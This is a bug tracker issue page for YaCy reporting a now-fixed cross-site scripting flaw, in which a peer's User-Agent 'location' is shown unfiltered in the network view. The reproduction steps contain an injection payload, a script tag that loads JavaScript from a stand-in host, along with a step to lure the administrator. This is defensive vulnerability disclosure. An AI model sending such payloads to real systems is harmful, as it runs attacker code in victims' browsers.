YaCy-Bugtracker

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0000204YaCyWishlist - Wunschlistepublic2012-08-03 23:082012-08-15 14:24
Reportersoultcer 
Assigned ToLotus 
PrioritynormalSeverityminorReproducibilityhave not tried
StatusresolvedResolutionfixed 
ETAnone 
PlatformOSOS Version
Product VersionYaCy 1.0 
Target VersionFixed in VersionYaCy 1.1 
Summary0000204: XSS attack YaCy peers using modified User-Agent string
DescriptionYaCy extracts the "location" from the User-Agent string. This "location" is displayed without any filter in the network view.
Steps To Reproduce1) Modify rogue YaCy instance to report it's own User-Agent as 'yacybot (freeworld/global; <script type="text/javascript" src="http://badsite.example/xss.js"></script> [^])'
2) Contact target peer with rogue YaCy instance.
3) Trick administrator of target peer to visit his network view.
TagsNo tags attached.
Attached Files

- Relationships

-  Notes
(0000413)
Lotus (developer)
2012-08-15 14:24

Fix in Commit ae9cd7a1182f853af45dc0a20b93bcdf462b97ca

- Issue History
Date Modified Username Field Change
2012-08-03 23:08 soultcer New Issue
2012-08-14 22:32 administrator View Status private => public
2012-08-15 14:24 Lotus Note Added: 0000413
2012-08-15 14:24 Lotus Status new => resolved
2012-08-15 14:24 Lotus Fixed in Version => YaCy 1.1
2012-08-15 14:24 Lotus Resolution open => fixed
2012-08-15 14:24 Lotus Assigned To => Lotus


Copyright © 2000 - 2018 MantisBT Team
Powered by Mantis Bugtracker